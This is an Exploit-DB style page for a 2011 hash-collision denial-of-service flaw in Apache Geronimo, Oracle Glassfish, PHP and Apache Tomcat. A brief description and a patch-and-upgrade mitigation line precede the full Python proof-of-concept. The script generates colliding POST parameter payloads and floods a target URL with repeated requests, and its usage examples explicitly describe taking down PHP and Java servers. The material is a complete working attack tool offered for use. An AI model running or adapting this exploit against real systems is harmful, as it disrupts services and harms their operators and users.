header-logo
Suggest Exploit
vendor:
Geronimo, Glassfish, PHP, Tomcat
by:
Christian Mehlmauer
7.5
CVSS
HIGH
Hash Collision Denial of Service
400
CWE
Product Name: Geronimo, Glassfish, PHP, Tomcat
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2011-5034, CVE-2011-5035, CVE-2011-4885, CVE-2011-4858
CPE: a:apache:geronimo, cpe:/a:oracle:glassfish, cpe:/a:php:php, cpe:/a:apache:tomcat
Metasploit:
Other Scripts:
Platforms Tested:
2011

Hashtable Denial of Service Vulnerability

This script generates payloads to exploit hash collision vulnerabilities in various servers including Apache Geronimo, Oracle Glassfish, PHP, and Apache Tomcat. It can be used to make multiple requests to a server without waiting for a response, potentially causing a denial of service. The payload length, collision character length, and number of collision characters can be customized.

Mitigation:

Apply patches provided by the respective vendors. Upgrade to a version that is not vulnerable to hash collision attacks.
Source

Exploit-DB raw data:

#!/usr/bin/env python

"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_

Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC

Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision

http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858

requires Python 2.7

Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP

-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP

-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2

Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""

import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools

class Payloadgenerator:
    # Maximum recursions when searching for collisionchars
    _recursivemax = 15
    _recursivecounter = 1
    
    def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
        self._verbose = verbose
        self._collisionchars = collisionchars
        self._collisioncharlength = collisioncharlength
        self._payloadlength = payloadlength
    
    def generateASPPayload(self):
        raise Exception("ASP Payload not implemented")
    
    def generateJAVAPayload(self):
        a = self._computeJAVACollisionChars(self._collisionchars)
        return self._generatePayload(a, self._payloadlength)
    
    def generatePHPPayload(self):
        # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
        # compute entries with collisions in PHP hashtable hash function
        a = self._computePHPCollisionChars(self._collisionchars)
        return self._generatePayload(a, self._payloadlength);
    
    def _computePHPCollisionChars(self, count):
        charrange = range(0, 256)
        return self._computeCollisionChars(self._DJBX33A, count, charrange)
    
    def _computeJAVACollisionChars(self, count):
        charrange = range(0, 129)
        return self._computeCollisionChars(self._DJBX31A, count, charrange)
    
    def _computeCollisionChars(self, function, count, charrange):
        hashes = {}
        counter = 0
        length = self._collisioncharlength
        a = ""
        for i in charrange:
            a = a+chr(i)
        source = list(itertools.product(a, repeat=length))
        basestr = ''.join(random.choice(source))
        basehash = function(basestr)
        hashes[str(counter)] = basestr
        counter = counter + 1
        for item in source:
            tempstr = ''.join(item)
            if tempstr == basestr:
                continue
            if function(tempstr) == basehash:
                hashes[str(counter)] = tempstr
                counter = counter + 1
            if counter >= count:
                break;
        if counter < count:
            # Try it again
            if self._recursivecounter > self._recursivemax:
                print("Not enought values found. Please start this script again")
                sys.exit(1)
            print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
            self._recursivecounter = self._recursivecounter + 1
            hashes = self._computeCollisionChars(function, count, charrange)
        else:
            if self._verbose:
                print("Found values:")
                for item in hashes:
                    tempstr = hashes[item]
                    print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
                    for i in tempstr:
                        print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
        return hashes
    
    def _DJBXA(self, inputstring, base, start):
        counter = len(inputstring) - 1
        result = start
        for item in inputstring:
            result = result + (math.pow(base, counter) * ord(item))
            counter = counter - 1
        return int(round(result))
    
    #PHP
    def _DJBX33A(self, inputstring):
        return self._DJBXA(inputstring, 33, 5381)
    
    #Java
    def _DJBX31A(self, inputstring):
        return self._DJBXA(inputstring, 31, 0)
    
    #ASP
    def _DJBX33X(self, inputstring):
        counter = len(inputstring) - 1
        result = 5381
        for item in inputstring:
            result = result + (int(round(math.pow(33, counter))) ^ ord(item))
            counter = counter - 1
        return int(round(result))
    
    def _generatePayload(self, collisionchars, payloadlength):
        # Taken from:
        # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
    
        # how long should the payload be
        length = payloadlength
        size = len(collisionchars)
        post = ""
        maxvaluefloat = math.pow(size,length)
        maxvalueint = int(math.floor(maxvaluefloat))
        for i in range (maxvalueint):
            inputstring = self._base_convert(i, size)
            result = inputstring.rjust(length, "0")
            for item in collisionchars:
                result = result.replace(str(item), collisionchars[item])
            post += urllib.urlencode({result:""}) + "&"
    
        return post;
    
    def _base_convert(self, num, base):
        fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        alphabet = fullalphabet[:base]
        if (num == 0):
            return alphabet[0]
        arr = []
        base = len(alphabet)
        while num:
            rem = num % base
            num = num // base
            arr.append(alphabet[rem])
        arr.reverse()
        return "".join(arr)

def main():
    parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
    parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
    parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
    parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
    parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
    parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
    parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
    parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
    parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
    parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
    parser.add_argument("--version", action="version", version="%(prog)s 6.0")

    options = parser.parse_args()
    
    if options.target == "PHP":
        if not options.maxpayloadsize or options.maxpayloadsize == 0:
            maxpayloadsize = 8
        else:
            maxpayloadsize = options.maxpayloadsize
    elif options.target == "ASP":
        if not options.maxpayloadsize or options.maxpayloadsize == 0:
            maxpayloadsize = 8
        else:
            maxpayloadsize = options.maxpayloadsize
    elif options.target == "JAVA":
        if not options.maxpayloadsize or options.maxpayloadsize == 0:
            maxpayloadsize = 2
        else:
            maxpayloadsize = options.maxpayloadsize
    else:
        print("Target %s not yet implemented" % options.target)
        sys.exit(1)

    url = urlparse.urlparse(options.url)

    if not url.scheme:
        print("Please provide a scheme to the URL(http://, https://,..")
        sys.exit(1)

    host = url.hostname
    path = url.path
    port = url.port
    if not port:
        if url.scheme == "https":
            port = 443
        elif url.scheme == "http":
            port = 80
        else:
            print("Unsupported Protocol %s" % url.scheme)
            sys.exit(1)
    if not path:
        path = "/"

    if not options.payload:
        print("Generating Payload...")
        
        # Number of colliding chars to find
        collisionchars = 5
        # Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
        collisioncharlength = 2
        # Length of each parameter in the payload
        payloadlength = 8
        generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
        if options.target == "PHP":
            payload = generator.generatePHPPayload()
        elif options.target == "ASP":
            #payload = generateASPPayload()
            print("Target %s not yet implemented" % options.target)
            sys.exit(1)
        elif options.target == "JAVA":
            payload = generator.generateJAVAPayload()
        else:
            print("Target %s not yet implemented" % options.target)
            sys.exit(1)

        print("Payload generated")
    else:
        f = open(options.payload, "r")
        payload = f.read()
        f.close()
        print("Loaded Payload from %s" % options.payload)

    # trim to maximum payload size (in MB)
    maxinmb = maxpayloadsize*1024*1024
    payload = payload[:maxinmb]
    # remove last invalid(cut off) parameter
    position = payload.rfind("=&")
    payload = payload[:position+1]
    
    # Save payload
    if options.save:
        f = open(options.save, "w")
        f.write(payload)
        f.close()
        print("Payload saved to %s" % options.save)

    # User selected to only generate the payload
    if options.generate:
        return

    print("Host: %s" % host)
    print("Port: %s" % str(port))
    print("path: %s" % path)
    print
    print

    for i in range(options.count):
        print("sending Request #%s..." % str(i+1))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if url.scheme == "https":
            ssl_sock = ssl.wrap_socket(sock)
            ssl_sock.connect((host, port))
            ssl_sock.settimeout(None)
        else:
            sock.connect((host, port))
            sock.settimeout(None)

        request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)

        if url.scheme == "https":
            ssl_sock.send(request)
        else:
            sock.send(request)

        if options.verbose:
            if len(request) > 400:
                print(request[:400]+"....")
            else:
                print(request)
            print("")
        if options.wait or options.output:
            start = time.time()
            if url.scheme == "https":
                data = ssl_sock.recv(1024)
                string = ""
                while len(data):
                    string = string + data
                    data = ssl_sock.recv(1024)
            else:
                data = sock.recv(1024)
                string = ""
                while len(data):
                    string = string + data
                    data = sock.recv(1024)
            
            elapsed = (time.time() - start)
            print("Request %s finished" % str(i+1))
            print("Request %s duration: %s" % (str(i+1), elapsed))
            split = string.partition("\r\n\r\n")
            header = split[0]
            content = split[2]
            if options.verbose:
                # only print http header
                print("")
                print(header)
                print("")
            if options.output:
                f = open(options.output+str(i)+".html", "w")
                f.write("<!-- "+header+" -->\r\n"+content)
                f.close()

        if url.scheme == "https":
            ssl_sock.close()
            sock.close()
        else:
            sock.close()

if __name__ == "__main__":
    main()